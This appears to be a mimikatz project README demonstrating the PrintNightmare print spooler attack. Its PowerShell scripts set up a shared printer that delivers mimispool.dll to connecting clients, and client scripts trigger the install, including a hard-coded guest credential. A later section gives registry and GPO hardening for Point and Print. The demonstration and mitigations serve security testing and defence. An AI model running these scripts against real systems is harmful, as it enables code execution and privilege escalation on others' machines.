## PowerShell commands
### Server
#### install
```
# Server-side setup for the mimispool demonstration.
# Writes into %SystemRoot%\System32, the spooler driver store and HKLM, so it
# presumably needs an elevated session — nothing below checks for that; confirm.
$printerName = 'Kiwi Legit Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
# Per-printer key in the local spooler's Print\Printers hive; every CopyFiles
# subkey created below hangs off this path.
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
# Fetches the latest mimikatz release archive into the current directory.
# NOTE(review): the download is not pinned to a release and no hash/signature
# check is performed before its DLLs are copied into system locations.
Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip' -OutFile '.\mimikatz_trunk.zip'
Expand-Archive -Path '.\mimikatz_trunk.zip' -DestinationPath '.\mimikatz_trunk'
# Stages three files: a copy of the system's own mscms.dll saved as
# system32\mimispool.dll, plus the x64 and Win32 mimispool.dll builds placed in
# the spooler driver directories (x64\3 and W32X86\3). These are the on-disk
# artifacts a defender can look for.
Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll')
# Installs the in-box 'Generic / Text Only' driver and shares a printer on it.
# The FILE: port means no physical device is involved.
Add-PrinterDriver -Name 'Generic / Text Only'
Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
# Three CopyFiles subkeys under the printer key, each with Directory / Files /
# Module values:
#   Kiwi   -> Directory x64\3,    Files mimispool.dll, Module mscms.dll
#   Litchi -> Directory W32X86\3, Files mimispool.dll, Module mscms.dll
#   Mango  -> no Directory/Files, Module mimispool.dll
# Detection note: CopyFiles subkeys under Print\Printers\<name> whose Module
# names a DLL outside the standard print-processor set are a useful indicator.
New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null
```
#### uninstall
```
# Server-side teardown: removes the shared printer, the in-box driver and the
# three staged mimispool.dll copies. It does not explicitly delete the CopyFiles
# subkeys the install script created under Print\Printers\<name>; presumably
# Remove-Printer drops the printer key with them — confirm by inspecting the hive.
$printerName = 'Kiwi Legit Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
Remove-Printer -Name $printerName
# Short pause before the driver is removed — presumably so the spooler has
# released it; no explicit check is made.
Start-Sleep -Seconds 2
Remove-PrinterDriver -Name 'Generic / Text Only'
# Same three paths the install script wrote to.
Remove-Item -Force -Path ($drivers + '\x64\3\mimispool.dll')
Remove-Item -Force -Path ($drivers + '\W32X86\3\mimispool.dll')
Remove-Item -Force -Path ($system32 + '\mimispool.dll')
```
### Client
#### Any computer, with explicit credentials for `printnightmare.gentilkiwi.com`
```
# Client-side demonstration against the public demo server, authenticating with
# an explicit credential. The credential below is hard-coded in clear text.
$serverName = 'printnightmare.gentilkiwi.com'
$username = 'gentilguest'
$password = 'password'
$printerName = 'Kiwi Legit Printer'
# UNC name of the shared printer: \\server\printer.
$fullprinterName = '\\' + $serverName + '\' + $printerName
$credential = (New-Object System.Management.Automation.PSCredential($username, (ConvertTo-SecureString -AsPlainText -String $password -Force)))
# Clean up leftovers from a previous run; errors are deliberately ignored here.
Remove-PSDrive -Force -Name 'KiwiLegitPrintServer' -ErrorAction SilentlyContinue
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
# Maps the server's print$ share with the explicit credential first —
# presumably so that the Add-Printer connection below reuses it; confirm.
New-PSDrive -Name 'KiwiLegitPrintServer' -Root ('\\' + $serverName + '\print$') -PSProvider FileSystem -Credential $credential | Out-Null
# Connecting to the shared printer pulls its driver onto this client.
Add-Printer -ConnectionName $fullprinterName
# Records the driver name so it can be removed again below.
$driver = (Get-Printer -Name $fullprinterName).DriverName
Remove-Printer -Name $fullprinterName
Remove-PrinterDriver -Name $driver
Remove-PSDrive -Force -Name 'KiwiLegitPrintServer'
# mimispool still in spool\drivers: removing the printer and driver leaves
# mimispool.dll in the local spooler driver directory, which is the artifact
# to check for when auditing a client.
```
#### Domain-joined computer (single sign-on to the print server as the current user)
```
# Same flow as the explicit-credential variant, but authenticates to the print
# server as the logged-on domain user: no credential object and no print$
# drive mapping are needed.
$serverName = 'print.lab.local'
$printerName = 'Kiwi Legit Printer'
# UNC name of the shared printer: \\server\printer.
$fullprinterName = '\\' + $serverName + '\' + $printerName
# Clean up a leftover connection from a previous run; the error is ignored.
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
# Connecting to the shared printer pulls its driver onto this client.
Add-Printer -ConnectionName $fullprinterName
# Records the driver name so it can be removed again below.
$driver = (Get-Printer -Name $fullprinterName).DriverName
Remove-Printer -Name $fullprinterName
Remove-PrinterDriver -Name $driver
# mimispool still in spool\drivers: removing the printer and driver leaves
# mimispool.dll in the local spooler driver directory, which is the artifact
# to check for when auditing a client.
```
## Protect
_adapt these settings to your environment_
**Please, do not set `RestrictDriverInstallationToAdministrators` to `0` without these settings**
### Registry
#### `.reg` file
```
Windows Registry Editor Version 5.00
; Package Point and Print hardening. These two values correspond to the GPO
; settings "Only use Package Point and Print" and
; "Package Point and Print - Approved servers" listed in the GPO / Local section.
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
"PackagePointAndPrintOnly"=dword:00000001
"PackagePointAndPrintServerList"=dword:00000001
; Approved-server list. The single entry below is deliberately invalid, so no
; print server is approved; replace it with real server names to allow some.
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
"1"="/your really legit servers or invalid entry !/"
```
#### commands
```
REM Same settings as the .reg file above, applied with reg.exe (writes HKLM, so
REM presumably an elevated prompt is required). The ListofServers entry is
REM deliberately invalid: no print server is approved until real names are added.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v 1 /t REG_SZ /d "/your really legit servers or invalid entry !/"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
```
### Registry with real printer servers and allowing non-administrators to install package P&P drivers & printers
#### `.reg` file
```
Windows Registry Editor Version 5.00
; Package Point and Print restricted to an explicit list of print servers
; (same two values as the deny-all variant).
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
"PackagePointAndPrintOnly"=dword:00000001
"PackagePointAndPrintServerList"=dword:00000001
; One entry per approved server; value name and data are both the server FQDN.
; Replace srv1.fqdn / srv2.fqdn with your own servers.
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
"srv1.fqdn"="srv1.fqdn"
"srv2.fqdn"="srv2.fqdn"
; Lowers the admin-only driver installation restriction so non-administrators
; can install drivers; the PackagePointAndPrint values above are what keep
; those installs limited to the listed servers.
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint]
"RestrictDriverInstallationToAdministrators"=dword:00000000
```
#### commands
```
REM Variant with real print servers, applied with reg.exe (writes HKLM, so
REM presumably an elevated prompt is required). One ListofServers entry per
REM approved server; replace srv1.fqdn / srv2.fqdn with your own FQDNs.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv1.fqdn" /t REG_SZ /d "srv1.fqdn"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv2.fqdn" /t REG_SZ /d "srv2.fqdn"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
REM Lowers the admin-only driver installation restriction so non-administrators
REM can install drivers; the PackagePointAndPrint values above are what keep
REM those installs limited to the listed servers.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 0
```
### GPO / Local
Under `Computer Configuration` → `Administrative Templates` → `Printers`, enable:
- `Only use Package Point and Print`
- `Package Point and Print - Approved servers`
![image](https://user-images.githubusercontent.com/2307945/129240741-b2a0ba14-6858-4c3f-ad07-07fa55efca29.png)
### GPO with real printer servers and allowing non-administrators to install package P&P drivers & printers
Same configuration as above – _with real print server names this time_ – but do not forget to set the registry value `RestrictDriverInstallationToAdministrators` to `0`
![image](https://user-images.githubusercontent.com/2307945/133833820-a66b3ffd-a3aa-43a2-a1bf-14581a2a7492.png)